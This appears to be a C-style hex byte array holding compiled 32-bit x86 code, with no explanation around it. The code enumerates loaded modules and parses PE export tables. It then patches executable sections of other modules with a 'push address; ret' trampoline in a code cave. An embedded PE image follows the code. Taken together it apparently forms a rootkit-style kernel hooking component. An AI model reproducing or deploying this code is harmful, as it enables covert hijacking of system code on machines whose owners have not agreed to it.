0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 
0x55,0x8b,0xec,0x83,0xec,0x08,0x8b,0x45,0x08,0x89,0x45,0xfc,0x83,0x7d,0xfc,0x00, 0x74,0x38,0x8b,0x4d,0xfc,0x03,0x0d,0x84,0x2d,0x00,0x10,0x89,0x4d,0xf8,0x6a,0x01, 0x8b,0x55,0x0c,0x52,0x8b,0x45,0xf8,0x50,0xff,0x15,0xa0,0x02,0x00,0x10,0x0f,0xb6, 0xc8,0x85,0xc9,0x74,0x05,0x8b,0x45,0xfc,0xeb,0x12,0x8b,0x55,0xfc,0x03,0x15,0x8c, 0x2d,0x00,0x10,0x8b,0x02,0x89,0x45,0xfc,0xeb,0xc2,0x33,0xc0,0x8b,0xe5,0x5d,0xc2, 0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0x7d,0x0c,0x00,0x74,0x0f,0x8b,0x45,0x0c,0x03,0x05,0x90,0x2d, 0x00,0x10,0x8b,0x00,0xeb,0x11,0xeb,0x0d,0x8b,0x4d,0x08,0x03,0x0d,0x88,0x2d,0x00, 0x10,0x8b,0x01,0xeb,0x02,0x33,0xc0,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x8b,0x45,0x08,0x03,0x05,0x94,0x2d,0x00,0x10,0x8b,0x00,0x5d,0xc2, 0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x38,0xc7,0x45,0xe8,0x00,0x00,0x00,0x00,0x6a,0x0b,0xe8, 0xbc,0xfb,0xff,0xff,0x89,0x45,0xf0,0x83,0x7d,0xf0,0x00,0x74,0x79,0xc7,0x45,0xe4, 0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x45,0xe4,0x83,0xc0,0x01,0x89,0x45,0xe4,0x8b, 0x4d,0xf0,0x8b,0x55,0xe4,0x3b,0x11,0x73,0x51,0x8b,0x45,0xe4,0x69,0xc0,0x1c,0x01, 0x00,0x00,0x8b,0x4d,0xf0,0x8b,0x55,0x08,0x3b,0x54,0x01,0x0c,0x76,0x3a,0x8b,0x45, 0xe4,0x69,0xc0,0x1c,0x01,0x00,0x00,0x8b,0x4d,0xe4,0x69,0xc9,0x1c,0x01,0x00,0x00, 0x8b,0x55,0xf0,0x8b,0x44,0x02,0x0c,0x8b,0x55,0xf0,0x03,0x44,0x0a,0x10,0x39,0x45, 0x08,0x73,0x15,0x8b,0x45,0xe4,0x69,0xc0,0x1c,0x01,0x00,0x00,0x8b,0x4d,0xf0,0x8b, 0x54,0x01,0x0c,0x89,0x55,0xe8,0xeb,0x02,0xeb,0x9c,0x6a,0x00,0x8b,0x45,0xf0,0x50, 0xff,0x15,0x90,0x02,0x00,0x10,0x83,0x7d,0xe8,0x00,0x75,0x08,0x8b,0x45,0x0c,0xe9, 0x5c,0x01,0x00,0x00,0x8b,0x4d,0xe8,0x8b,0x55,0xe8,0x03,0x51,0x3c,0x89,0x55,0xfc, 0x8b,0x45,0xfc,0x0f,0xb7,0x48,0x14,0x8b,0x55,0xfc,0x8d,0x44,0x0a,0x18,0x89,0x45, 0xec,0x6a,0x06,0x6a,0x00,0x8d,0x4d,0xf4,0x51,0xe8,0xf0,0xfb,0xff,0xff,0x83,0xc4, 
0x0c,0xc7,0x45,0xe0,0x00,0x00,0x00,0x00,0xeb,0x12,0x8b,0x55,0xe0,0x83,0xc2,0x01, 0x89,0x55,0xe0,0x8b,0x45,0xec,0x83,0xc0,0x28,0x89,0x45,0xec,0x8b,0x4d,0xfc,0x0f, 0xb7,0x51,0x06,0x39,0x55,0xe0,0x0f,0x83,0x01,0x01,0x00,0x00,0x68,0xc8,0x07,0x00, 0x10,0x8b,0x45,0xec,0x50,0xe8,0x4a,0xfc,0xff,0xff,0x83,0xc4,0x08,0x85,0xc0,0x0f, 0x85,0xe3,0x00,0x00,0x00,0x8b,0x4d,0xec,0x8b,0x51,0x24,0x81,0xe2,0x00,0x00,0x00, 0x20,0x0f,0x84,0xd1,0x00,0x00,0x00,0x8b,0x45,0xec,0x8b,0x48,0x24,0x81,0xe1,0x00, 0x00,0x00,0x02,0x0f,0x85,0xbf,0x00,0x00,0x00,0x8b,0x55,0xfc,0x8b,0x42,0x38,0x83, 0xe8,0x01,0x8b,0x4d,0xec,0x23,0x41,0x08,0x74,0x1c,0x8b,0x55,0xfc,0x8b,0x42,0x38, 0x83,0xe8,0x01,0xf7,0xd0,0x8b,0x4d,0xec,0x23,0x41,0x08,0x8b,0x55,0xfc,0x03,0x42, 0x38,0x89,0x45,0xc8,0xeb,0x09,0x8b,0x45,0xec,0x8b,0x48,0x08,0x89,0x4d,0xc8,0x8b, 0x55,0xc8,0x89,0x55,0xdc,0x8b,0x45,0xec,0x8b,0x4d,0xdc,0x2b,0x48,0x08,0x89,0x4d, 0xd8,0x83,0x7d,0xd8,0x06,0x76,0x71,0x8b,0x55,0xec,0x8b,0x42,0x0c,0x8b,0x4d,0xec, 0x03,0x41,0x08,0x03,0x45,0xe8,0x89,0x45,0xd4,0x8b,0x55,0xd8,0x83,0xea,0x06,0x89, 0x55,0xd0,0xeb,0x09,0x8b,0x45,0xd0,0x83,0xe8,0x01,0x89,0x45,0xd0,0x83,0x7d,0xd0, 0x00,0x74,0x45,0x8b,0x4d,0xd4,0x03,0x4d,0xd0,0x89,0x4d,0xcc,0x6a,0x06,0x8d,0x55, 0xf4,0x52,0x8b,0x45,0xcc,0x50,0xff,0x15,0xe8,0x02,0x00,0x10,0x83,0xf8,0x06,0x75, 0x25,0xe8,0xea,0x1e,0x00,0x00,0x8b,0x4d,0xcc,0xc6,0x01,0x68,0x8b,0x55,0xcc,0x8b, 0x45,0x0c,0x89,0x42,0x01,0x8b,0x4d,0xcc,0xc6,0x41,0x05,0xc3,0xe8,0xef,0x1e,0x00, 0x00,0x8b,0x45,0xcc,0xeb,0x0a,0xeb,0xac,0xe9,0xdd,0xfe,0xff,0xff,0x8b,0x45,0x0c, 0x8b,0xe5,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x28,0xc7,0x45,0xf8,0x00,0x00,0x00,0x00,0xe8,0xee,0xde, 0xff,0xff,0x89,0x45,0xfc,0x83,0x7d,0xfc,0x00,0x0f,0x84,0x26,0x01,0x00,0x00,0x68, 0xd0,0x07,0x00,0x10,0x8d,0x45,0xec,0x50,0xff,0x15,0x20,0x03,0x00,0x10,0x8d,0x4d, 0xec,0x51,0x8b,0x55,0xfc,0x52,0xe8,0x05,0xfd,0xff,0xff,0x89,0x45,0xf4,0x83,0x7d, 
0xf4,0x00,0x0f,0x84,0xeb,0x00,0x00,0x00,0x8b,0x45,0xf4,0x50,0x68,0xdc,0x07,0x00, 0x10,0xe8,0x4c,0xfa,0xff,0xff,0x83,0xc4,0x08,0xc7,0x45,0xe8,0x00,0x00,0x00,0x00, 0x8b,0x4d,0xe8,0x51,0x8b,0x55,0xf4,0x52,0xe8,0x33,0xfd,0xff,0xff,0x89,0x45,0xe8, 0x83,0x7d,0xe8,0x00,0x0f,0x84,0xb7,0x00,0x00,0x00,0x8b,0x45,0xe8,0x50,0xe8,0x4d, 0xfd,0xff,0xff,0x89,0x45,0xe4,0x83,0x7d,0xe4,0x00,0x0f,0x84,0x9c,0x00,0x00,0x00, 0x8b,0x4d,0xe4,0x51,0x8b,0x55,0xe8,0x52,0x68,0x10,0x08,0x00,0x10,0xe8,0x00,0xfa, 0xff,0xff,0x83,0xc4,0x0c,0x8b,0x45,0xe4,0x03,0x05,0x98,0x2d,0x00,0x10,0x8b,0x08, 0x89,0x4d,0xe0,0x83,0x7d,0xe0,0x00,0x75,0x02,0xeb,0xa5,0x8b,0x55,0xe0,0x03,0x15, 0xa0,0x2d,0x00,0x10,0x8b,0x02,0x89,0x45,0xd8,0x83,0x7d,0xd8,0x00,0x75,0x02,0xeb, 0x8f,0x8b,0x4d,0x08,0x51,0x68,0xb0,0x21,0x00,0x10,0xe8,0xe1,0xf3,0xff,0xff,0x50, 0x8b,0x55,0xe4,0x52,0x8b,0x45,0xd8,0x50,0xe8,0x83,0xee,0xff,0xff,0x89,0x45,0xdc, 0x83,0x7d,0xdc,0x00,0x74,0x36,0x8b,0x4d,0xdc,0x51,0x8b,0x55,0xd8,0x52,0xe8,0xed, 0xfc,0xff,0xff,0x8b,0x4d,0xe0,0x03,0x0d,0xa0,0x2d,0x00,0x10,0x89,0x01,0x8b,0x55, 0xdc,0x52,0x8b,0x45,0xd8,0x50,0x68,0x48,0x08,0x00,0x10,0xe8,0x82,0xf9,0xff,0xff, 0x83,0xc4,0x0c,0x8b,0x4d,0xf8,0x83,0xc1,0x01,0x89,0x4d,0xf8,0xe9,0x2f,0xff,0xff, 0xff,0xeb,0x0d,0x68,0x80,0x08,0x00,0x10,0xe8,0x65,0xf9,0xff,0xff,0x83,0xc4,0x04, 0xe8,0xbb,0xde,0xff,0xff,0x8b,0x45,0xf8,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc, 0x55,0x8b,0xec,0x51,0x83,0x7d,0x08,0x00,0x74,0x26,0xc7,0x45,0xfc,0x00,0x00,0x00, 0x00,0xeb,0x09,0x8b,0x45,0xfc,0x83,0xc0,0x01,0x89,0x45,0xfc,0x8b,0x4d,0x08,0x03, 0x4d,0xfc,0x0f,0xbe,0x11,0x85,0xd2,0x74,0x02,0xeb,0xe8,0x8b,0x45,0xfc,0xeb,0x02, 0x33,0xc0,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x0c,0x8b,0x45,0x08,0x50,0xe8,0xb1,0xff,0xff,0xff,0x89, 0x45,0xf8,0x8b,0x4d,0x0c,0x51,0xe8,0xa5,0xff,0xff,0xff,0x89,0x45,0xfc,0x8b,0x55, 0xf8,0x3b,0x55,0xfc,0x74,0x07,0xb8,0x01,0x00,0x00,0x00,0xeb,0x3b,0xc7,0x45,0xf4, 
0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x45,0xf4,0x83,0xc0,0x01,0x89,0x45,0xf4,0x8b, 0x4d,0xf4,0x3b,0x4d,0xf8,0x73,0x1f,0x8b,0x55,0x08,0x03,0x55,0xf4,0x0f,0xbe,0x02, 0x8b,0x4d,0x0c,0x03,0x4d,0xf4,0x0f,0xbe,0x11,0x3b,0xc2,0x74,0x07,0xb8,0x01,0x00, 0x00,0x00,0xeb,0x04,0xeb,0xd0,0x33,0xc0,0x8b,0xe5,0x5d,0xc2,0x08,0x00,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x08,0x8b,0x45,0x0c,0x50,0xe8,0x41,0xff,0xff,0xff,0x83, 0xc0,0x01,0x89,0x45,0xfc,0xc7,0x45,0xf8,0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x4d, 0xf8,0x83,0xc1,0x01,0x89,0x4d,0xf8,0x8b,0x55,0xf8,0x3b,0x55,0xfc,0x73,0x12,0x8b, 0x45,0x08,0x03,0x45,0xf8,0x8b,0x4d,0x0c,0x03,0x4d,0xf8,0x8a,0x11,0x88,0x10,0xeb, 0xdd,0x8b,0x45,0x08,0x8b,0xe5,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x51,0x8b,0x45,0x08,0x89,0x45,0xfc,0xeb,0x09,0x8b,0x4d,0x08,0x83, 0xc1,0x01,0x89,0x4d,0x08,0x8b,0x55,0xfc,0x52,0xe8,0xe2,0xfe,0xff,0xff,0x03,0x45, 0xfc,0x39,0x45,0x08,0x77,0x26,0x8b,0x45,0x08,0x0f,0xbe,0x08,0x83,0xf9,0x41,0x7c, 0x19,0x8b,0x55,0x08,0x0f,0xbe,0x02,0x83,0xf8,0x5a,0x7f,0x0e,0x8b,0x4d,0x08,0x0f, 0xbe,0x11,0x83,0xc2,0x20,0x8b,0x45,0x08,0x88,0x10,0xeb,0xc0,0x8b,0x45,0xfc,0x8b, 0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x0f,0xb7,0x45,0x08,0x83,0xf8,0x41,0x7c,0x12,0x0f,0xb7,0x4d,0x08, 0x83,0xf9,0x5a,0x7f,0x09,0x0f,0xb7,0x45,0x08,0x83,0xc0,0x20,0xeb,0x04,0x66,0x8b, 0x45,0x08,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x14,0x8b,0x45,0x08,0x0f,0xb7,0x08,0x8b,0x55,0x0c,0x0f, 0xb7,0x02,0x3b,0xc8,0x7d,0x0c,0x8b,0x4d,0x08,0x66,0x8b,0x11,0x66,0x89,0x55,0xee, 0xeb,0x0a,0x8b,0x45,0x0c,0x66,0x8b,0x08,0x66,0x89,0x4d,0xee,0x0f,0xb7,0x55,0xee, 0xd1,0xea,0x66,0x89,0x55,0xfc,0xb8,0x01,0x00,0x00,0x00,0x66,0x89,0x45,0xf8,0xeb, 0x0c,0x66,0x8b,0x4d,0xf8,0x66,0x83,0xc1,0x01,0x66,0x89,0x4d,0xf8,0x0f,0xb7,0x55, 0xf8,0x0f,0xb7,0x45,0xfc,0x3b,0xd0,0x7d,0x71,0x8b,0x4d,0x08,0x0f,0xb7,0x11,0xd1, 
0xea,0x0f,0xb7,0x45,0xf8,0x2b,0xd0,0x8b,0x4d,0x08,0x8b,0x41,0x04,0x66,0x8b,0x0c, 0x50,0x66,0x89,0x4d,0xf4,0x8b,0x55,0x0c,0x0f,0xb7,0x02,0xd1,0xe8,0x0f,0xb7,0x4d, 0xf8,0x2b,0xc1,0x8b,0x55,0x0c,0x8b,0x4a,0x04,0x66,0x8b,0x14,0x41,0x66,0x89,0x55, 0xf0,0x0f,0xb6,0x45,0x10,0x85,0xc0,0x74,0x1c,0x0f,0xb7,0x4d,0xf4,0x51,0xe8,0x2d, 0xff,0xff,0xff,0x66,0x89,0x45,0xf4,0x0f,0xb7,0x55,0xf0,0x52,0xe8,0x1f,0xff,0xff, 0xff,0x66,0x89,0x45,0xf0,0x0f,0xb7,0x45,0xf4,0x0f,0xb7,0x4d,0xf0,0x3b,0xc1,0x74, 0x04,0x32,0xc0,0xeb,0x07,0xe9,0x77,0xff,0xff,0xff,0xb0,0x01,0x8b,0xe5,0x5d,0xc2, 0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x1c,0xc7,0x45,0xfc,0x00,0x00,0x00,0x00,0x8b,0x45,0x08, 0x8b,0x4d,0x08,0x03,0x48,0x3c,0x89,0x4d,0xf8,0x8b,0x55,0xf8,0x0f,0xb7,0x42,0x04, 0x3d,0x4c,0x01,0x00,0x00,0x75,0x17,0x8b,0x4d,0xf8,0x83,0x79,0x78,0x00,0x74,0x0c, 0x8b,0x55,0xf8,0x8b,0x45,0x08,0x03,0x42,0x78,0x89,0x45,0xfc,0xeb,0x3c,0x8b,0x4d, 0xf8,0x0f,0xb7,0x51,0x04,0x81,0xfa,0x64,0x86,0x00,0x00,0x75,0x29,0x8b,0x45,0x08, 0x8b,0x4d,0x08,0x03,0x48,0x3c,0x89,0x4d,0xf4,0x8b,0x55,0xf4,0x83,0xba,0x88,0x00, 0x00,0x00,0x00,0x74,0x0f,0x8b,0x45,0xf4,0x8b,0x4d,0x08,0x03,0x88,0x88,0x00,0x00, 0x00,0x89,0x4d,0xfc,0xeb,0x04,0x33,0xc0,0xeb,0x7c,0x83,0x7d,0xfc,0x00,0x74,0x74, 0x8b,0x55,0xfc,0x8b,0x45,0x08,0x03,0x42,0x1c,0x89,0x45,0xf0,0x8b,0x4d,0xfc,0x8b, 0x55,0x08,0x03,0x51,0x24,0x89,0x55,0xec,0x8b,0x45,0xfc,0x8b,0x4d,0x08,0x03,0x48, 0x20,0x89,0x4d,0xe8,0xc7,0x45,0xe4,0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x55,0xe4, 0x83,0xc2,0x01,0x89,0x55,0xe4,0x8b,0x45,0xfc,0x8b,0x4d,0xe4,0x3b,0x48,0x14,0x73, 0x33,0x8b,0x55,0x0c,0x52,0x8b,0x45,0xe4,0x8b,0x4d,0xe8,0x8b,0x55,0x08,0x03,0x14, 0x81,0x52,0xe8,0xf9,0xfc,0xff,0xff,0x85,0xc0,0x75,0x17,0x8b,0x45,0xe4,0x8b,0x4d, 0xec,0x0f,0xbf,0x14,0x41,0x8b,0x45,0xf0,0x8b,0x4d,0x08,0x03,0x0c,0x90,0x8b,0xc1, 0xeb,0x04,0xeb,0xb9,0x33,0xc0,0x8b,0xe5,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc, 
0x55,0x8b,0xec,0x81,0xec,0x84,0x00,0x00,0x00,0xc7,0x45,0xc0,0x00,0x00,0x00,0x00, 0x68,0x88,0x0c,0x00,0x10,0x8d,0x45,0xc4,0x50,0xff,0x15,0x20,0x03,0x00,0x10,0x68, 0x98,0x0c,0x00,0x10,0x8d,0x4d,0xe0,0x51,0xff,0x15,0x20,0x03,0x00,0x10,0xc7,0x45, 0xe8,0xb4,0x0c,0x00,0x10,0xc7,0x45,0xec,0xc4,0x0c,0x00,0x10,0xc7,0x45,0xf0,0xdc, 0x0c,0x00,0x10,0xc7,0x45,0xf4,0xf4,0x0c,0x00,0x10,0xc7,0x45,0xf8,0x0c,0x0d,0x00, 0x10,0xc7,0x45,0xfc,0x28,0x0d,0x00,0x10,0xc7,0x45,0xd0,0x44,0x0d,0x00,0x10,0xc7, 0x45,0xd4,0x60,0x0d,0x00,0x10,0xc7,0x45,0xd8,0x7c,0x0d,0x00,0x10,0xc7,0x45,0xdc, 0x98,0x0d,0x00,0x10,0x6a,0x0b,0xe8,0x85,0xf4,0xff,0xff,0x89,0x45,0xcc,0x83,0x7d, 0xcc,0x00,0x0f,0x84,0xda,0x01,0x00,0x00,0x8b,0x55,0x08,0x52,0x8d,0x45,0xac,0x50, 0xff,0x15,0x18,0x03,0x00,0x10,0x6a,0x01,0x8d,0x4d,0xac,0x51,0x8d,0x55,0xb4,0x52, 0xff,0x15,0x14,0x03,0x00,0x10,0x89,0x45,0xbc,0x83,0x7d,0xbc,0x00,0x0f,0x8c,0xa3, 0x01,0x00,0x00,0xc7,0x45,0xa8,0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x45,0xa8,0x83, 0xc0,0x01,0x89,0x45,0xa8,0x8b,0x4d,0xcc,0x8b,0x55,0xa8,0x3b,0x11,0x0f,0x83,0x79, 0x01,0x00,0x00,0x8b,0x45,0xa8,0x69,0xc0,0x1c,0x01,0x00,0x00,0x8b,0x4d,0xcc,0x8d, 0x54,0x01,0x04,0x8b,0x45,0xa8,0x69,0xc0,0x1c,0x01,0x00,0x00,0x8b,0x4d,0xcc,0x0f, 0xb7,0x44,0x01,0x1e,0x8d,0x4c,0x02,0x1c,0x51,0x8d,0x55,0x9c,0x52,0xff,0x15,0x18, 0x03,0x00,0x10,0x6a,0x01,0x8d,0x45,0x9c,0x50,0x8d,0x4d,0x94,0x51,0xff,0x15,0x14, 0x03,0x00,0x10,0x89,0x45,0xa4,0x83,0x7d,0xa4,0x00,0x0f,0x8c,0x27,0x01,0x00,0x00, 0x6a,0x01,0x8d,0x55,0xc4,0x52,0x8d,0x45,0xb4,0x50,0xff,0x15,0xa0,0x02,0x00,0x10, 0x0f,0xb6,0xc8,0x85,0xc9,0x74,0x5d,0xc7,0x45,0x90,0x00,0x00,0x00,0x00,0xeb,0x09, 0x8b,0x55,0x90,0x83,0xc2,0x01,0x89,0x55,0x90,0x83,0x7d,0x90,0x06,0x7d,0x40,0x8b, 0x45,0x90,0x8b,0x4c,0x85,0xe8,0x51,0x8d,0x55,0x88,0x52,0xff,0x15,0x20,0x03,0x00, 0x10,0x6a,0x01,0x8d,0x45,0x88,0x50,0x8d,0x4d,0x94,0x51,0xff,0x15,0xa0,0x02,0x00, 0x10,0x0f,0xb6,0xd0,0x85,0xd2,0x74,0x15,0x8b,0x45,0xa8,0x69,0xc0,0x1c,0x01,0x00, 
0x00,0x8b,0x4d,0xcc,0x8b,0x54,0x01,0x0c,0x89,0x55,0xc0,0xeb,0x02,0xeb,0xb1,0xe9, 0xa1,0x00,0x00,0x00,0x6a,0x01,0x8d,0x45,0xe0,0x50,0x8d,0x4d,0xb4,0x51,0xff,0x15, 0xa0,0x02,0x00,0x10,0x0f,0xb6,0xd0,0x85,0xd2,0x74,0x60,0xc7,0x45,0x84,0x00,0x00, 0x00,0x00,0xeb,0x09,0x8b,0x45,0x84,0x83,0xc0,0x01,0x89,0x45,0x84,0x83,0x7d,0x84, 0x04,0x7d,0x46,0x8b,0x4d,0x84,0x8b,0x54,0x8d,0xd0,0x52,0x8d,0x85,0x7c,0xff,0xff, 0xff,0x50,0xff,0x15,0x20,0x03,0x00,0x10,0x6a,0x01,0x8d,0x8d,0x7c,0xff,0xff,0xff, 0x51,0x8d,0x55,0x94,0x52,0xff,0x15,0xa0,0x02,0x00,0x10,0x0f,0xb6,0xc0,0x85,0xc0, 0x74,0x15,0x8b,0x4d,0xa8,0x69,0xc9,0x1c,0x01,0x00,0x00,0x8b,0x55,0xcc,0x8b,0x44, 0x0a,0x0c,0x89,0x45,0xc0,0xeb,0x02,0xeb,0xab,0xeb,0x2a,0x6a,0x01,0x8d,0x4d,0x94, 0x51,0x8d,0x55,0xb4,0x52,0xff,0x15,0xa0,0x02,0x00,0x10,0x0f,0xb6,0xc0,0x85,0xc0, 0x74,0x13,0x8b,0x4d,0xa8,0x69,0xc9,0x1c,0x01,0x00,0x00,0x8b,0x55,0xcc,0x8b,0x44, 0x0a,0x0c,0x89,0x45,0xc0,0x8d,0x4d,0x94,0x51,0xff,0x15,0x10,0x03,0x00,0x10,0x83, 0x7d,0xc0,0x00,0x74,0x02,0xeb,0x05,0xe9,0x70,0xfe,0xff,0xff,0x8d,0x55,0xb4,0x52, 0xff,0x15,0x10,0x03,0x00,0x10,0x6a,0x00,0x8b,0x45,0xcc,0x50,0xff,0x15,0x90,0x02, 0x00,0x10,0x8b,0x45,0xc0,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x08,0x83,0x7d,0x08,0x00,0x0f,0x85,0xc9,0x00,0x00,0x00, 0x8b,0x45,0x0c,0x89,0x45,0xf8,0x8b,0x4d,0xf8,0x8b,0x51,0x0c,0x52,0x8b,0x45,0xf8, 0x8b,0x48,0x0c,0x51,0xe8,0x87,0xf0,0xff,0xff,0x0f,0xb6,0xd0,0x85,0xd2,0x75,0x07, 0x32,0xc0,0xe9,0xa4,0x00,0x00,0x00,0x8b,0x45,0xf8,0x8b,0x08,0x89,0x0d,0x18,0x2e, 0x00,0x10,0x8b,0x55,0xf8,0x8b,0x42,0x0c,0xa3,0x1c,0x2e,0x00,0x10,0x8b,0x4d,0xf8, 0x8b,0x11,0x52,0x68,0xb4,0x0d,0x00,0x10,0x8b,0x45,0xf8,0x8b,0x48,0x0c,0x51,0xe8, 0xdc,0xee,0xff,0xff,0x0f,0xb6,0xd0,0x85,0xd2,0x75,0x04,0x32,0xc0,0xeb,0x6c,0xa1, 0x18,0x2e,0x00,0x10,0x50,0x68,0xc4,0x0d,0x00,0x10,0xe8,0xf3,0xf2,0xff,0xff,0x83, 0xc4,0x08,0x68,0xf0,0x0d,0x00,0x10,0xe8,0x04,0xfd,0xff,0xff,0x89,0x45,0xfc,0x83, 
0x7d,0xfc,0x00,0x74,0x33,0x8b,0x4d,0xfc,0x51,0x68,0xfc,0x0d,0x00,0x10,0xe8,0xcf, 0xf2,0xff,0xff,0x83,0xc4,0x08,0x8b,0x55,0xfc,0x52,0x68,0x28,0x0e,0x00,0x10,0x8b, 0x45,0xf8,0x8b,0x48,0x0c,0x51,0xe8,0x85,0xee,0xff,0xff,0x0f,0xb6,0xd0,0x85,0xd2, 0x75,0x04,0x32,0xc0,0xeb,0x15,0xeb,0x11,0x68,0x34,0x0e,0x00,0x10,0xe8,0xa0,0xf2, 0xff,0xff,0x83,0xc4,0x04,0x32,0xc0,0xeb,0x02,0xb0,0x01,0x8b,0xe5,0x5d,0xc2,0x08, 0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x4d,0x5a,0x90,0x00,0x03,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0xff,0xff,0x00,0x00, 0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xd0,0x00,0x00,0x00, 0x0e,0x1f,0xba,0x0e,0x00,0xb4,0x09,0xcd,0x21,0xb8,0x01,0x4c,0xcd,0x21,0x54,0x68, 0x69,0x73,0x20,0x70,0x72,0x6f,0x67,0x72,0x61,0x6d,0x20,0x63,0x61,0x6e,0x6e,0x6f, 0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6e,0x20,0x69,0x6e,0x20,0x44,0x4f,0x53,0x20, 0x6d,0x6f,0x64,0x65,0x2e,0x0d,0x0d,0x0a,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x11,0xcb,0xaf,0x83,0x55,0xaa,0xc1,0xd0,0x55,0xaa,0xc1,0xd0,0x55,0xaa,0xc1,0xd0, 0x72,0x6c,0xba,0xd0,0x52,0xaa,0xc1,0xd0,0x55,0xaa,0xc0,0xd0,0x4c,0xaa,0xc1,0xd0, 0x5c,0xd2,0x45,0xd0,0x51,0xaa,0xc1,0xd0,0x5c,0xd2,0x53,0xd0,0x54,0xaa,0xc1,0xd0, 0x5c,0xd2,0x50,0xd0,0x54,0xaa,0xc1,0xd0,0x52,0x69,0x63,0x68,0x55,0xaa,0xc1,0xd0, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x50,0x45,0x00,0x00,0x4c,0x01,0x04,0x00,0x80,0x01,0xe4,0x50,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0xe0,0x00,0x02,0x21,0x0b,0x01,0x09,0x00,0x00,0x06,0x00,0x00, 0x00,0x0c,0x00,0x00,0x00,0x00,0x00,0x00,0x50,0x12,0x00,0x00,0x00,0x10,0x00,0x00, 0x00,0x20,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x10,0x00,0x00,0x00,0x02,0x00,0x00, 0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 
0x00,0x50,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x40,0x05, 0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00, 0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x60,0x26,0x00,0x00,0x4e,0x00,0x00,0x00, 0xd8,0x23,0x00,0x00,0x50,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x40,0x00,0x00,0xc8,0x00,0x00,0x00,0x70,0x20,0x00,0x00,0x1c,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x70,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2e,0x74,0x65,0x78,0x74,0x00,0x00,0x00, 